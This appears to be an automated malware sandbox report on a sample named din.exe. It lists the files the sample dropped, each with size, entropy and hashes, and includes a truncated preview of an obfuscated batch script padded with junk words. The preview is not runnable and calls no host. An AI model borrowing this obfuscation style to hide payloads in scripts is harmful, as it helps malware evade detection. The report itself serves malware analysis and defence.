                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):279948
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999452908363733
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:6144:9I6GDSktA64fYoI9b2JcEXRnH2CrbDFblEw6jcduSayn4YVyWnG:SGeoTaq1BWCrfFblEw7/G
                                                                                                                                                                                                                                                                                      MD5:964C7B84B1CC40E6989696C505EDF218
                                                                                                                                                                                                                                                                                      SHA1:49F295A8053FDCA1ADDF009E1BDC8C59EF809E98
                                                                                                                                                                                                                                                                                      SHA-256:A29DD71C7574F57B4FE5351625CEEBE6096D7B2F5D91CD98B85573D5215C7CF4
                                                                                                                                                                                                                                                                                      SHA-512:A183C02C2810D202D29C2119718CEE5EA7A5F6562433B1F7D3F206879F35940DDD595EA4B6AC48796B603FDD060B49318F2B6464482ED23900404A19E608F514
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):103855
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.924096864897051
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:RMz/M7tHsx/iGyQVUdJpABfSi77IbHZ0PmFKq:lds9iGyQVUd0Bf77cZPT
                                                                                                                                                                                                                                                                                      MD5:BF3BA995DA7EBD2C798D60CE43BE3281
                                                                                                                                                                                                                                                                                      SHA1:0C49C0363019C027303DA06A844E9AA5467B1958
                                                                                                                                                                                                                                                                                      SHA-256:03FD23C77660CDF0C2C24F904662B9EAB30CB5C6D630C91771C89DACAF2FFD4E
                                                                                                                                                                                                                                                                                      SHA-512:5C9A18050C6D67CB50E6D7F09ED15E73B2BC6D19B6EA51683C04D5444EEB22AB37944D8678EAF4C54DA03B22856870B2B785F48F8BC916F03419D30E951C25C8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):110592
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.280376662201836
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:VZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laWS:VK5vPeDkjGgQaE/l8
                                                                                                                                                                                                                                                                                      MD5:87BB88EBBC24DD6F13DE197D0F6A7862
                                                                                                                                                                                                                                                                                      SHA1:07CA6F0247975D6B7BE7371E460272562A28C183
                                                                                                                                                                                                                                                                                      SHA-256:06A470E2DAD7EADF779865990F9AC593D396CED7103FBB8BF81EB52FAC2A94EB
                                                                                                                                                                                                                                                                                      SHA-512:06F1A3E5A2311F360E0414D5EA5253E092D04A681A47EB6D12159AE4DB196FDDAC3052190537DE8F90D6268D56917F93BA7D78E45C5E50767F91C0BA2FFD95F8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (318), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10821
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.174883446196345
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:x788DwR7CRUOTQFvnjMYGi8hD8liZZjvMq5ZFKRnz/Vbaa1zOJAV6BgFmWCH3h:xoAwR7CRUOMBno1hdZFz5SRnTQa1qJWS
                                                                                                                                                                                                                                                                                      MD5:9B1C1B91D5DD7CD249DFC18C83265CAD
                                                                                                                                                                                                                                                                                      SHA1:A7BE36A126B1650E3B1AA5150DCE01877972AD2B
                                                                                                                                                                                                                                                                                      SHA-256:256DAB2DE8F31FD3B6DDEC1D1CA49A79BBD8DE0EC9997256169E35C22BFCB477
                                                                                                                                                                                                                                                                                      SHA-512:CB71A372EEFBB519C5CBBAC618C031AB6BC6E7B1FB19C7D250B16D51B1EDC9349E72E1D263006ADD5253C268B23CD5887F1171B65A3FA708864D58BC90762B69
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:Set Una=q..aChRModerate-Slave-Promotions-Respective-Edges-Regarding-Coupon-Neither-..rwwIcon-Channel-Garbage-Winners-Trademarks-..dOcxPf-Identity-Are-..GbYFont-Newest-Retreat-Quote-Forms-Chuck-Performer-Electric-Sunrise-..TtgEpa-Garage-Bottle-Made-Friends-Owners-..BrHostel-Individually-..Set Camel=y..wQAReconstruction-Activists-Yeah-Phil-Distribute-Cartoons-Minds-Gym-..sYKTue-Snake-Catering-Nl-Newsletters-Floyd-Virgin-..GeEDUr-..xpvMEnzyme-Gibson-..PuVmAdvise-Recommendation-Tp-Riverside-..THLJHundreds-..CoyHansen-Bedroom-Conferences-Conspiracy-Proceeding-Acknowledge-Gender-Tomorrow-Danish-..zCeIssue-Privacy-Sustainability-Longitude-..UuQContrast-Edited-Chapter-Protocols-Cats-Write-Douglas-..Set Appendix=6..wHAmazing-Kinda-Rca-Compression-Perception-Browser-Stockholm-Experiment-..FmOLaunched-..mfAutomatic-App-Jury-Puzzles-Respect-Sku-..TbUri-Fever-Morning-Determine-Peterson-Consent-..MaAdventure-Desktops-Cocks-Unique-Paxil-..CSKQGot-Fight-Mobiles-Viewed-Newscom-Globe-Exchange-..VVOJGian
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (318), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10821
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.174883446196345
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:x788DwR7CRUOTQFvnjMYGi8hD8liZZjvMq5ZFKRnz/Vbaa1zOJAV6BgFmWCH3h:xoAwR7CRUOMBno1hdZFz5SRnTQa1qJWS
                                                                                                                                                                                                                                                                                      MD5:9B1C1B91D5DD7CD249DFC18C83265CAD
                                                                                                                                                                                                                                                                                      SHA1:A7BE36A126B1650E3B1AA5150DCE01877972AD2B
                                                                                                                                                                                                                                                                                      SHA-256:256DAB2DE8F31FD3B6DDEC1D1CA49A79BBD8DE0EC9997256169E35C22BFCB477
                                                                                                                                                                                                                                                                                      SHA-512:CB71A372EEFBB519C5CBBAC618C031AB6BC6E7B1FB19C7D250B16D51B1EDC9349E72E1D263006ADD5253C268B23CD5887F1171B65A3FA708864D58BC90762B69
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:Set Una=q..aChRModerate-Slave-Promotions-Respective-Edges-Regarding-Coupon-Neither-..rwwIcon-Channel-Garbage-Winners-Trademarks-..dOcxPf-Identity-Are-..GbYFont-Newest-Retreat-Quote-Forms-Chuck-Performer-Electric-Sunrise-..TtgEpa-Garage-Bottle-Made-Friends-Owners-..BrHostel-Individually-..Set Camel=y..wQAReconstruction-Activists-Yeah-Phil-Distribute-Cartoons-Minds-Gym-..sYKTue-Snake-Catering-Nl-Newsletters-Floyd-Virgin-..GeEDUr-..xpvMEnzyme-Gibson-..PuVmAdvise-Recommendation-Tp-Riverside-..THLJHundreds-..CoyHansen-Bedroom-Conferences-Conspiracy-Proceeding-Acknowledge-Gender-Tomorrow-Danish-..zCeIssue-Privacy-Sustainability-Longitude-..UuQContrast-Edited-Chapter-Protocols-Cats-Write-Douglas-..Set Appendix=6..wHAmazing-Kinda-Rca-Compression-Perception-Browser-Stockholm-Experiment-..FmOLaunched-..mfAutomatic-App-Jury-Puzzles-Respect-Sku-..TbUri-Fever-Morning-Determine-Peterson-Consent-..MaAdventure-Desktops-Cocks-Unique-Paxil-..CSKQGot-Fight-Mobiles-Viewed-Newscom-Globe-Exchange-..VVOJGian
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):61836
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997252530589562
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:1536:N0nErpywxLH42VwRdQegiDayorDRk4XcxP9YnWnG:NIENy6jVwRd1gSayorDa4YP9yWnG
                                                                                                                                                                                                                                                                                      MD5:6D7407741F7BC4D14B1A165CAE065EAE
                                                                                                                                                                                                                                                                                      SHA1:D3FF6FAFDBEC63432748F2911584F9F0EDD35E80
                                                                                                                                                                                                                                                                                      SHA-256:5AF440AFD27D24086571B7F38985B3F3B53B1EBF9C726F247A498AB59AC0EB52
                                                                                                                                                                                                                                                                                      SHA-512:6CBD54C3E909C279A35EE0FE3546DF8B2BD4F003BC9F86479406C69D4F5C008318018FC81BC1800544DBBD2DB8917C27055736AC3F335D490540EA6A0960BE1B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1938
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.913291123011718
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:D9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhu:hSEA5O5W+MfH5u
                                                                                                                                                                                                                                                                                      MD5:1D5C9309802807FDA7F567C0EB99C511
                                                                                                                                                                                                                                                                                      SHA1:9F1F7BFD13AC93A8748C8C7D6716790CE0EF8ADE
                                                                                                                                                                                                                                                                                      SHA-256:B3D39CC1EBF070F3EAC4C6922A64E4B689D527FDC98D4D8B005BB1E54636ACD0
                                                                                                                                                                                                                                                                                      SHA-512:D2E84ED1F3562B6C417685CA4E894B18002E6C4A0169C5276FEAD7C3C2D53E52D505F578F3FE93E020D78D80E25A94D315B202816F6793F2D30141E72E8AB95B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):57344
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.582971432205184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:En+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLg:E+AqVnBypIbv18mLthfhng
                                                                                                                                                                                                                                                                                      MD5:20B321CDCBBDDE96DBA00A2FBD8D5E19
                                                                                                                                                                                                                                                                                      SHA1:CFC520D14A265340A11DAABED5089B0098EC4C15
                                                                                                                                                                                                                                                                                      SHA-256:8A2872987492498E61CFD5AED3C742340D0952FF7F059496F068D1CB834EE085
                                                                                                                                                                                                                                                                                      SHA-512:F51492092486B66F4AFD5F6A1E895F4A97B81BFF30524094E30AF01BD98E042ADEAF1CF39C388C13D0FBB54E34FB7543458AC50D11DB0CBB4F39AF880A2B4028
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):78848
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.995959875030467
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:v5el3EYrDWyu0uZo2+9BGmdATGODv7xvU:v5elDWy4ZNoGmROL7FU
                                                                                                                                                                                                                                                                                      MD5:C2A985269513E29FDF2CBBDA266EDAD2
                                                                                                                                                                                                                                                                                      SHA1:A83740B27B92C4209D5569939DCE12A1AF5EB40C
                                                                                                                                                                                                                                                                                      SHA-256:966D083F627920AB66704DE4EBF30D86F97DAB9E39376D2FFD52B2526531BEE3
                                                                                                                                                                                                                                                                                      SHA-512:503579285BDAB51F3652304C762C56647EEE59567BA7F34197121ED824946F801EE16304271C7892CD547C3912C20C1320873C0BE68C873F1673C7BAC0DA3303
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):77824
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.691325670862485
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:VGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:8Kaj6iTcPAsAhxjgarB
                                                                                                                                                                                                                                                                                      MD5:BAFBC57F3FCA9279969C3A70BA3D398F
                                                                                                                                                                                                                                                                                      SHA1:5B47EDF11B275ED08F6D63C189D366428DC9B50D
                                                                                                                                                                                                                                                                                      SHA-256:FFBD3D0228613665949DA7051EDF3ADFEB9E603C10FE071C26FF42D3A95D1F98
                                                                                                                                                                                                                                                                                      SHA-512:1B0FAB4D2BAD4D3AFF7C542B712E306D1BF201B7D854B10310A12478C02269B71A7FE79E76AD5D5CC29F160D3FB7BF5B39D81E8E6A80746AB1173515850D5FA6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):62464
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997532965210444
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:1536:ao5EFDnXmQt2KPcnhFoxve3tEcu8KV8OS6y:ao+FDnNcnhqUtADSR
                                                                                                                                                                                                                                                                                      MD5:3D808EB22EF8125F2977E8C9DEE7CBF4
                                                                                                                                                                                                                                                                                      SHA1:801D525957B76E139EC278EE5DAF06E795DF06EC
                                                                                                                                                                                                                                                                                      SHA-256:D30DF2A6AF6CF7E41C9BDEDAA5F2EF26D8A5B60E083084BD346552B5FF9C8B67
                                                                                                                                                                                                                                                                                      SHA-512:1A60D81BED532E4EE588F24B67C52C8120B4497FF5BDA721F3966E37DCFB5C33DE5B05B4CC0325E41CD6E66849FF7597E4B621856CF8193F75E3F0DA329EA1D0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):58368
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.996979129201062
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:1536:yPnAsgWrJifVjC+qlZ1Uw4B5ZVzVBi8qUv5krDsoZvJNVv1D:yPKWr8fVm+qlZB4fZRVDqok/RvbVZ
                                                                                                                                                                                                                                                                                      MD5:53303EE3BA975E2C0410A9FBD20C9021
                                                                                                                                                                                                                                                                                      SHA1:AB1DB0890BB3670673E81AE890A944946C889A82
                                                                                                                                                                                                                                                                                      SHA-256:6BA931FF62297ADEC1C996CC673572B10B908F617E4ECD9125AC83B9D8D68ACF
                                                                                                                                                                                                                                                                                      SHA-512:28ABFD2AB43A6764AEF7B1A64636000D61E95C3587DBE036E82CE7253DC1506680D33D83F3C752106F6FD1ED81B03405FDC1390A4BE7D9577EF110C0B67D23A8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):102400
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.366406638646967
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:ZeoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8E:yO5bLezWWt/Dd314V14ZgP0T
                                                                                                                                                                                                                                                                                      MD5:C225DB9FEA424C533DF0E1DF700A2FDA
                                                                                                                                                                                                                                                                                      SHA1:C1E6D4E20885B6E40E5E9B5516421B5AD08FE56F
                                                                                                                                                                                                                                                                                      SHA-256:A98534A3B8DA106D513DCE08BC42A91E126916397FC2D7A972AA58E75F5C333E
                                                                                                                                                                                                                                                                                      SHA-512:7EA377E53D2097A35F652F1781A4E93036AD0A5304261463FFC47751C7D629A95FF2B819D8F30B88610A4D7E8F128034D618F423CCBF7DCFD5133A13E4C35F81
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):99328
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.8265829918587535
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:VHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPa:VLeAg0Fuz08XvBNbjaAtsPa
                                                                                                                                                                                                                                                                                      MD5:FFB7BB96C2761809C529CD2701D39AA5
                                                                                                                                                                                                                                                                                      SHA1:4C137A6A047D23C9FB36AC5E7AC487D8445113F6
                                                                                                                                                                                                                                                                                      SHA-256:71DF34A0F80A981B2181C56613EC941B52F89148F07DAC146A428BCA77B19C36
                                                                                                                                                                                                                                                                                      SHA-512:D10EB51ED08D4E315ABF15C910A4F794A7D8B952A6B7BAD4A3B62E5242B727BD62205FB0D79CEA1042A59190C058F54F8A45E7E290EACD4CE7FB48754ED42551
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):105472
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.642250428528698
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:7bi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHD:7bfSCOMVIPPL/sZ7HS3zH
                                                                                                                                                                                                                                                                                      MD5:F680055C3F355CBEFE689EEB454B288D
                                                                                                                                                                                                                                                                                      SHA1:6C8D045F3ED632D452F584AF5F22C7E99C2CEE5A
                                                                                                                                                                                                                                                                                      SHA-256:959F6959D96EB27E5201DC9521925786C24E4EFFAE051049057EF736C63E06CA
                                                                                                                                                                                                                                                                                      SHA-512:B95BD9CBFE18D7283A896FC325E78FAC5CC7EE9493D4682A3BE8A408C924AE08074D63D8B2A0000DBDA29E725F3958C2F5D7B3E7C36F08D1D53E5EC6BEDE5CFA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):24779
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.258291776820648
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:kHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:sphAiPChgZ2kOE6
                                                                                                                                                                                                                                                                                      MD5:3E942AAC4A2AE891334E575E5C56AF2D
                                                                                                                                                                                                                                                                                      SHA1:4B2C158F9A2B1FC3D2C17A4FF2ED9078EC15C7B0
                                                                                                                                                                                                                                                                                      SHA-256:AE3AB1F2DA012D59FF620AF33313879A0F1A2EBB2E6E4CA2B0FDE7E2D8917CAA
                                                                                                                                                                                                                                                                                      SHA-512:D7FF5F693B95433E9BCF6412A4B743703A79CC2FBD0F38052F9501B0A9832076CDD0F58DDEFE1D32229A5C3D83801E3FE27BE62521FD8C7BAC16C5857F0BD673
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):97280
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997940121037945
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:1536:aqQcJlHQaQXmPwCrh9URzIhk4yXNMExjNMcffHuVznwYYDZIjdOr2n81ywnAdeN6:aqQylwtXmoxsKfXNMExjDHSVFMrbDAd1
                                                                                                                                                                                                                                                                                      MD5:0B84E4CCF5043EC6EFD0A24E950203D0
                                                                                                                                                                                                                                                                                      SHA1:CE6DBAB2322539FE281F83AB280E93974E97ADE9
                                                                                                                                                                                                                                                                                      SHA-256:FBBA259A1854811DAE48F73DD71CB3807B19E3EC928D878A5CD5BE51B7E15212
                                                                                                                                                                                                                                                                                      SHA-512:7AF1898E75B28B3B6177602E4CEA635B5A84999E9155E1062E31EF65970B99D4BA3CBC2EB372BE077992FF401E2F4FF87D06411A0E5F587894CA813B1017783F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):136192
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.668150143905245
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:eBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESA:8NPj0nEo3tb2j6AUkB0CThp6A
                                                                                                                                                                                                                                                                                      MD5:35E8869B521CDB585A97F64215B52D70
                                                                                                                                                                                                                                                                                      SHA1:5D8E347CDE78992BFDAA094184BFCED2E3947C6A
                                                                                                                                                                                                                                                                                      SHA-256:0E6BB286391B6039559C88E04D69778E4C67D728EFD36DA241E19757109F6DF9
                                                                                                                                                                                                                                                                                      SHA-512:E2319728C825DC3802055716BC145BAB8A00095EEB8726B38F66991225ADBD7C6086252E8816385B7DA522254C8C260EA461A986F76CCD723BE8B894747708AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):152576
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.700242782297185
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:1UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAU4CE0IS:1UDtf0accB3gBmmLsiS+SAhCt
                                                                                                                                                                                                                                                                                      MD5:C656763EE2D44A6E12C2A5567611257A
                                                                                                                                                                                                                                                                                      SHA1:17AD80849922769EA786AD92AE07A69A9B7B12AC
                                                                                                                                                                                                                                                                                      SHA-256:D99F3184BC917C532670BC3A6900DE21BEF704FC426328DFA8BEB3DD3A4F9C65
                                                                                                                                                                                                                                                                                      SHA-512:6CE406F707D9543659A89A707214D2B9D197A9738B8DD50D082B3F32818DF2E512E79B5EF382221201998C5D17291F878E7B8338DDE5C8B8EB60BDDF96E491FE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):31335
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                      MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                      SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                      SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                      SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1420
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.403963661938477
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0M45TFL0F7b5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5W
                                                                                                                                                                                                                                                                                      MD5:41FA1F75300AB95D346FC591D88A0D04
                                                                                                                                                                                                                                                                                      SHA1:6DB9ACA20E299A5A92F19610CD9F176A7FB8B6DD
                                                                                                                                                                                                                                                                                      SHA-256:8E17BB341DEB37E5F278DBBED938ACB9E280CA34321545AE051231EC74AEACA7
                                                                                                                                                                                                                                                                                      SHA-512:DA914816B9ED6B49FAABAD12A5B631A1408BC31670566B852353DDE9BFBAA3DA49C2AD8A7D7105ECA9DC7D458230CFE9FDD7D31754B4263B4533249C57B6D7EA
                                                                                                                                                                                                                                                                                      Malicious:false
